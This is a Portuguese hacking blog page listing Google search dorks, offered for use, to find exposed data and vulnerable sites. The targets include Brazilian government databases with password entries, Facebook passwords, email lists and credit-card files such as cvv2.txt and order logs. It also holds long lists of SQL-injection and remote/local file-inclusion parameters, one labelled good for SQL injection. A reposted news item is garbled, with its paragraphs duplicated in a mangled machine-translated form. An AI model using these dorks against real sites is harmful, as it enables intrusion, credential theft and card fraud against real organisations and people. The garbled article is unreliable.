Dork: inurl:.gov +"syntax" +sql inurl:.php
Advanced Search, Applied through dorks ("set of search operators."), Capture sensitive information, failures in servers. Group aimed at advanced filters to search engines & Digital Security Research.
Parceiro: Camisetas Hacker
Mostrando postagens com marcador string. Mostrar todas as postagens
Mostrando postagens com marcador string. Mostrar todas as postagens
sexta-feira, 20 de julho de 2012
segunda-feira, 28 de maio de 2012
Essa dork vai para os carinhas da net que gosta de um Scanner especifico pra vulneráveis php
Essa dork vai para os carinhas da net que gosta de um Scanner especifico pra vulneráveis php
Dork: inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"
quinta-feira, 26 de janeiro de 2012
Dork para busca de emails
DORK: inurl:com.br +@ +gov +mail filetype:txt
quinta-feira, 29 de setembro de 2011
PESQUISA SENHA BD SQL PARÂMETRO VALUES.
PESQUISA SENHA BD SQL PARÂMETRO VALUES.
Código:
-repositorio.interlegis.gov.br -svn.softwarepublico site:.br +values +sql +senha ext:sql
quarta-feira, 31 de agosto de 2011
Acreditem meus amigo que com isso você encontra senha.
Acreditem meus amigo que com isso voce encontra senha
"senha:" ext:txt
segunda-feira, 22 de agosto de 2011
Pesquisar parâmetro sql dentro de bancos .gov.br
Vamos pesquisa, com uma simples String de busca temos um resultado interessante.
Buscando extençoes .sql em sites de domínio .gov +INSERT INTO = inseriri dados em base sql.
buscando esses parâmetros temos até acesso a senhas e outros dados.
Dork: -repositorio -svn -softwarepublico site:.gov.br INSERT INTO ext:sql
domingo, 14 de agosto de 2011
Scan Senha de Facebook pelo google.
1º Abra o google.
2º Digite isso na barra de pesquisa: intext:"Date Submitted" intext:"password"
3º Seja feliz.
sábado, 16 de julho de 2011
Procurar Senhas em BD SQL Brasileiros
Procurar Senhas em Banco SQL sites Brasileiros
Sabemos que buscando com a string site:br ext:sql o retorno é de site que possuem bancos sql,
Sites brasileiros, Agora com combinação de senha e o termo sql "INSERT INTO" que é de inclusão de dados em bancos sql podemos ter acesso uma serie de tabelas contendo senhas de adm, usuários.
String:
Boa pesquisa.
sábado, 7 de maio de 2011
Dork Acessando Banco SQL vull SQL Report
Sabado dia 07/05/2011 sem nada pra fazer criei uma dork que pode ajudar muita gente ae em termos hacking, busca de tabelas e outras coisas. pois com essa dork você tem acesso direto a consultas do banco, muitas vezes até login de adm.
O dork em se busca a plataforma de gerenciamento SQL Report.
SQL Server Reporting Services fornece uma gama completa de ready-to-use ferramentas e serviços para ajudar você a criar, implantar e gerenciar relatórios para a sua organização, bem como recursos de programação que lhe permitem estender e personalizar a funcionalidade do seu relato.
O Reporting Services é uma plataforma de relatórios baseada em servidor que fornece funcionalidade abrangente de relatórios para uma variedade de fontes de dados. Reporting Services inclui um conjunto completo de ferramentas para você criar, gerenciar e entregar relatórios, e APIs que permitem que os desenvolvedores integrem ou estendam o processamento de dados e relatórios em aplicativos personalizados. As ferramentas do Reporting Services funcionam dentro do ambiente Microsoft Visual Studio e estão totalmente integradas com as ferramentas do SQL Server e componentes.
Com o Reporting Services, você pode criar relatórios interativos, tabulares, gráficos ou de forma livre a partir de fontes de dados relacionais, multidimensionais ou baseadas em XML. Você pode publicar relatórios, agendar o processamento de relatórios ou acessar relatórios sob demanda. O Reporting Services também permite criar relatórios ad hoc com base em modelos predefinidos e explorar dados interativamente dentro do modelo. Você pode escolher entre uma variedade de formatos de exibição, exportar relatórios para outras aplicações, e assinar relatórios publicados. Os relatórios que você criar pode ser visto através de uma conexão baseada na Web ou como parte de um aplicativo do Microsoft Windows ou site do SharePoint. O Reporting Services fornece a chave para seus dados comerciais.
Para obter informações sobre outros componentes do SQL Server, ferramentas e recursos, consulte SQL Server Books Online .
Dork:
-forum -forums -support site:.br SQL Report Página gerada
Autor:GoogleINURL
sexta-feira, 22 de abril de 2011
Acessando BD access com dork
Acessando BD access com dork
Geralmente o caminho da bd vem com o erro da pagina só copiar e color no seu navegado se a barra tiver investida so ageitar pronto.Dork:
-pdf -forum site:*.br +Driver *.mdb
Autor:googleinurl
quinta-feira, 14 de abril de 2011
Dork para uma busca em varios sites de nosso governo ERRO SQL é de menos.
Secretaria de Logística e Tecnologia da Informação
A ampliação da transparência e do controle social sobre as ações do Governo Federal é um dos objetivos principais da SLTI e, entre as suas atribuições, está a competência de planejar, coordenar, supervisionar e orientar, normativamente, as atividades do Sistema de Administração de Recursos de Informação e Informática - SISP, com enfoque na melhoria da prestação de serviços por meios eletrônicos e na regulamentação das compras e contratações públicas relacionadas ao uso das Tecnologias da Informação e Comunicação, no âmbito da Administração Pública Federal direta, autárquica e fundacional.
Com esta simples dork veremos a grande estrutura que sites do governo brasileiro nos oferece.
Dork: -forum -pdf -svn.softwarepublico.gov.br inurl:.gov.br mysql_connect() +id=
Autor:Googleinurl
Dork para busca de erros em algums sites do governo na Paraíba
Dork para busca de erros em algums sites do governo na Paraíba.
inurl:pb.gov.br inurl:id= +error
Autor:Googleinurl
domingo, 10 de abril de 2011
Dork para busca de ProxY ~~
Dorks,, By Googleinurl
+proxy intext:8080 ext:txt
ou
proxy intext:8080 ext:txt
ou
proxy 200. intext:8080 ext:txt
ou
proxy,ip,port 200. intext:8080 ext:xls
Não cheguei a testar os poxy achados, mais creio que pode ajudar alguem.
Dork para um busca de erros em sites Emissora de tv
Dork para busca de erros sql em sites de Emissora de tv Brasileiras :),
Nem sempre o achado do erro sql siguinifica um grande burado no site.Dork:
-forum -hardware.com.br -mxstudio.com.br -imasters.com.br site:*.com.* +br +tv +error +sql
Autor: Googleinurl
quinta-feira, 7 de abril de 2011
Dork para buscar error sql em sites de orgãos brasileiros.
Dork criada para busca de erros sql em sites .org brasileiros,
Milhões investidos veja infraestrutura dos sites .org do brasil
Dork: inurl:org +br inurl:id= +error +sql
Fonte: blog.inurl.com.br
Autor: Googleinurl
O Governo brasileiro CRIOU UM Orgão Que vai supervisionar uma Segurança do País cyber, Fonte de notícias online relatado Convergência Digital.
A organização, chamado de grupo de segurança cibernética técnica, vai funcionar sob o governo de TIC Departamento de Segurança DSIC e incluirá os ministros da Justiça do Brasil, relações exteriores e defesa, bem como funcionários do Exército, Marinha e agências de aeronáutica. A Organização, chamado de Grupo de Segurança cibernética Técnica, vai funcionar soluço o Governo de TIC Departamento de Segurança DSIC e incluirá OS ministros da Justiça do Brasil, Relações Exteriores e Defesa, Bem Como Funcionários do Exército, Marinha e Agências de Aeronáutica.
O grupo ficará encarregado de proteger os sistemas governamentais de comunicação e bases de dados, bem como à salvaguarda das infra-estruturas críticas. O Grupo ficará Encarregado de Proteger OS Sistemas Governamentais de Comunicação e bases de Dados, Bem Como à salvaguarda das infra-estruturas Críticas.
Em maio, a imprensa local citou cabeça DSIC Raphael Mandarino, dizendo que o governo brasileiro está estudando a elaboração de um plano nacional de contingência em caso de um ataque cibernético. Em maio, A Imprensa local Citou Cabeça DSIC Raphael Mandarino, dizendo Que o Governo brasileiro estabele Estudando um Elaboração de Plano de hum Nacional de contingência in Caso de Ataque cibernético um. Ele também observou que uma do governo federal de 320 redes receberam 3mn ataques durante os 12 meses anteriores. also UMA Que marca Ele observou do Governo Federal de 320 Redes receberam 3mn Ataques Durante OS 12 Meses Anteriores.
Ele disse que o governo já formou vários grupos para estudar a viabilidade de um tal plano. Elementos Disse Que o Governo JÁ formou Vários Grupos parágrafo Estudar um Plano.
Fonte:http://www.bnamericas.com/news/technology/Government_creates_cyber_security_body A organização, chamado de grupo de segurança cibernética técnica, vai funcionar sob o governo de TIC Departamento de Segurança DSIC e incluirá os ministros da Justiça do Brasil, relações exteriores e defesa, bem como funcionários do Exército, Marinha e agências de aeronáutica. A Organização, chamado de Grupo de Segurança cibernética Técnica, vai funcionar soluço o Governo de TIC Departamento de Segurança DSIC e incluirá OS ministros da Justiça do Brasil, Relações Exteriores e Defesa, Bem Como Funcionários do Exército, Marinha e Agências de Aeronáutica.
O grupo ficará encarregado de proteger os sistemas governamentais de comunicação e bases de dados, bem como à salvaguarda das infra-estruturas críticas. O Grupo ficará Encarregado de Proteger OS Sistemas Governamentais de Comunicação e bases de Dados, Bem Como à salvaguarda das infra-estruturas Críticas.
Em maio, a imprensa local citou cabeça DSIC Raphael Mandarino, dizendo que o governo brasileiro está estudando a elaboração de um plano nacional de contingência em caso de um ataque cibernético. Em maio, A Imprensa local Citou Cabeça DSIC Raphael Mandarino, dizendo Que o Governo brasileiro estabele Estudando um Elaboração de Plano de hum Nacional de contingência in Caso de Ataque cibernético um. Ele também observou que uma do governo federal de 320 redes receberam 3mn ataques durante os 12 meses anteriores. also UMA Que marca Ele observou do Governo Federal de 320 Redes receberam 3mn Ataques Durante OS 12 Meses Anteriores.
Ele disse que o governo já formou vários grupos para estudar a viabilidade de um tal plano. Elementos Disse Que o Governo JÁ formou Vários Grupos parágrafo Estudar um Plano.
sábado, 26 de fevereiro de 2011
BANCO DE STRINGS
Banco de Strings SQL ERROS
Conjunto de Strings Que expõe erros SQL em determinados sites.
OBS:BOM PARA SQL INJECTION.
Banco de Strings Busca MÚSICAS
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de mídia.
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de senhas ou privilégios de edição.
Banco de Strings Busca CÂMERAS & WEB-CAN
Conjunto de Strings Que expõe Câmeras de vigilância & Web-Can's.
Dorks variadas
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=
ASP DORK
nurl:”add.asp?bookid=”
inurl:”add_cart.asp?num=”
inurl:”addcart.asp?”
inurl:”addItem.asp”
inurl:”add-to-cart.asp?ID=”
inurl:”addToCart.asp?idProduct=”
inurl:”addtomylist.asp?ProdId=”
inurl:”adminEditProductFields.asp?intProdID=”
inurl:”advSearch_h.asp?idCategory=”
inurl:”affiliate.asp?ID=”
inurl:”affiliate-agreement.cfm?storeid=”
inurl:”affiliates.asp?id=”
inurl:”ancillary.asp?ID=”
inurl:”archive.asp?id=”
inurl:”article.asp?id=”
inurl:”aspx?PageID”
inurl:”basket.asp?id=”
inurl:”Book.asp?bookID=”
inurl:”book_list.asp?bookid=”
inurl:”book_view.asp?bookid=”
inurl:”BookDetails.asp?ID=”
inurl:”browse.asp?catid=”
inurl:”browse_item_details.asp”
inurl:”Browse_Item_Details.asp?Store_Id=”
inurl:”buy.asp?”
inurl:”buy.asp?bookid=”
inurl:”bycategory.asp?id=”
inurl:”cardinfo.asp?card=”
inurl:”cart.asp?action=”
inurl:”cart.asp?cart_id=”
inurl:”cart.asp?id=”
inurl:”cart_additem.asp?id=”
inurl:”cart_validate.asp?id=”
inurl:”cartadd.asp?id=”
inurl:”cat.asp?iCat=”
inurl:”catalog.asp”
inurl:”catalog.asp?CatalogID=”
inurl:”catalog_item.asp?ID=”
inurl:”catalog_main.asp?catid=”
inurl:”category.asp”
inurl:”category.asp?catid=”
inurl:”category_list.asp?id=”
inurl:”categorydisplay.asp?catid=”
inurl:”checkout.asp?cartid=”
inurl:”checkout.asp?UserID=”
inurl:”checkout_confirmed.asp?order_id=”
inurl:”checkout1.asp?cartid=”
inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
inurl:”comersus_optReviewReadExec.asp?idProduct=”
inurl:”comersus_viewItem.asp?idProduct=”
inurl:”comments_form.asp?ID=”
inurl:”contact.asp?cartId=”
inurl:”content.asp?id=”
inurl:”customerService.asp?TextID1=”
inurl:”default.asp?catID=”
inurl:”description.asp?bookid=”
inurl:”details.asp?BookID=”
inurl:”details.asp?Press_Release_ID=”
inurl:”details.asp?Product_ID=”
inurl:”details.asp?Service_ID=”
inurl:”display_item.asp?id=”
inurl:”displayproducts.asp”
inurl:”downloadTrial.asp?intProdID=”
inurl:”emailproduct.asp?itemid=”
inurl:”emailToFriend.asp?idProduct=”
inurl:”events.asp?ID=”
inurl:”faq.asp?cartID=”
inurl:”faq_list.asp?id=”
inurl:”faqs.asp?id=”
inurl:”feedback.asp?title=”
inurl:”freedownload.asp?bookid=”
inurl:”fullDisplay.asp?item=”
inurl:”getbook.asp?bookid=”
inurl:”GetItems.asp?itemid=”
inurl:”giftDetail.asp?id=”
inurl:”help.asp?CartId=”
inurl:”home.asp?id=”
inurl:”index.asp?cart=”
inurl:”index.asp?cartID=”
inurl:”index.asp?ID=”
inurl:”info.asp?ID=”
inurl:”item.asp?eid=”
inurl:”item.asp?item_id=”
inurl:”item.asp?itemid=”
inurl:”item.asp?model=”
inurl:”item.asp?prodtype=”
inurl:”item.asp?shopcd=”
inurl:”item_details.asp?catid=”
inurl:”item_list.asp?maingroup”
inurl:”item_show.asp?code_no=”
inurl:”itemDesc.asp?CartId=”
inurl:”itemdetail.asp?item=”
inurl:”itemdetails.asp?catalogid=”
inurl:”learnmore.asp?cartID=”
inurl:”links.asp?catid=”
inurl:”list.asp?bookid=”
inurl:”List.asp?CatID=”
inurl:”listcategoriesandproducts.asp?idCategory=”
inurl:”modline.asp?id=”
inurl:”myaccount.asp?catid=”
inurl:”news.asp?id=”
inurl:”order.asp?BookID=”
inurl:”order.asp?id=”
inurl:”order.asp?item_ID=”
inurl:”OrderForm.asp?Cart=”
inurl:”page.asp?PartID=”
inurl:”payment.asp?CartID=”
inurl:”pdetail.asp?item_id=”
inurl:”powersearch.asp?CartId=”
inurl:”privacy.asp?cartID=”
inurl:”prodbycat.asp?intCatalogID=”
inurl:”prodetails.asp?prodid=”
inurl:”prodlist.asp?catid=”
inurl:”product.asp?bookID=”
inurl:”product.asp?intProdID=”
inurl:”product_info.asp?item_id=”
inurl:”productDetails.asp?idProduct=”
inurl:”productDisplay.asp”
inurl:”productinfo.asp?item=”
inurl:”productlist.asp?ViewType=Category&CategoryID= “
inurl:”productpage.asp”
inurl:”products.asp?ID=”
inurl:”products.asp?keyword=”
inurl:”products_category.asp?CategoryID=”
inurl:”products_detail.asp?CategoryID=”
inurl:”productsByCategory.asp?intCatalogID=”
inurl:”prodView.asp?idProduct=”
inurl:”promo.asp?id=”
inurl:”promotion.asp?catid=”
inurl:”pview.asp?Item=”
inurl:”resellers.asp?idCategory=”
inurl:”results.asp?cat=”
inurl:”savecart.asp?CartId=”
inurl:”search.asp?CartID=”
inurl:”searchcat.asp?search_id=”
inurl:”Select_Item.asp?id=”
inurl:”Services.asp?ID=”
inurl:”shippinginfo.asp?CartId=”
inurl:”shop.asp?a=”
inurl:”shop.asp?action=”
inurl:”shop.asp?bookid=”
inurl:”shop.asp?cartID=”
inurl:”shop_details.asp?prodid=”
inurl:”shopaddtocart.asp”
inurl:”shopaddtocart.asp?catalogid=”
inurl:”shopbasket.asp?bookid=”
inurl:”shopbycategory.asp?catid=”
inurl:”shopcart.asp?title=”
inurl:”shopcreatorder.asp”
inurl:”shopcurrency.asp?cid=”
inurl:”shopdc.asp?bookid=”
inurl:”shopdisplaycategories.asp”
inurl:”shopdisplayproduct.asp?catalogid=”
inurl:”shopdisplayproducts.asp”
inurl:”shopexd.asp”
inurl:”shopexd.asp?catalogid=”
inurl:”shopping_basket.asp?cartID=”
inurl:”shopprojectlogin.asp”
inurl:”shopquery.asp?catalogid=”
inurl:”shopremoveitem.asp?cartid=”
inurl:”shopreviewadd.asp?id=”
inurl:”shopreviewlist.asp?id=”
inurl:”ShopSearch.asp?CategoryID=”
inurl:”shoptellafriend.asp?id=”
inurl:”shopthanks.asp”
inurl:”shopwelcome.asp?title=”
inurl:”show_item.asp?id=”
inurl:”show_item_details.asp?item_id=”
inurl:”showbook.asp?bookid=”
inurl:”showStore.asp?catID=”
inurl:”shprodde.asp?SKU=”
inurl:”specials.asp?id=”
inurl:”store.asp?id=”
inurl:”store_bycat.asp?id=”
inurl:”store_listing.asp?id=”
inurl:”Store_ViewProducts.asp?Cat=”
inurl:”store-details.asp?id=”
inurl:”storefront.asp?id=”
inurl:”storefronts.asp?title=”
inurl:”storeitem.asp?item=”
inurl:”StoreRedirect.asp?ID=”
inurl:”subcategories.asp?id=”
inurl:”tek9.asp?”
inurl:”template.asp?Action=Item&pid=”
inurl:”topic.asp?ID=”
inurl:”tuangou.asp?bookid=”
inurl:”type.asp?iType=”
inurl:”updatebasket.asp?bookid=”
inurl:”updates.asp?ID=”
inurl:”view.asp?cid=”
inurl:”view_cart.asp?title=”
inurl:”view_detail.asp?ID=”
inurl:”viewcart.asp?CartId=”
inurl:”viewCart.asp?userID=”
inurl:”viewCat_h.asp?idCategory=”
inurl:”viewevent.asp?EventID=”
inurl:”viewitem.asp?recor=”
inurl:”viewPrd.asp?idcategory=”
inurl:”ViewProduct.asp?misc=”
inurl:”voteList.asp?item_ID=”
inurl:”whatsnew.asp?idCategory=”
inurl:”WsAncillary.asp?ID=”
SQL DORK
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
RFI AND LFI
RFI
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. allinurl:ihm.php?p=
7. Keyword : “powered by AllMyLinks”
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name=allmyguests
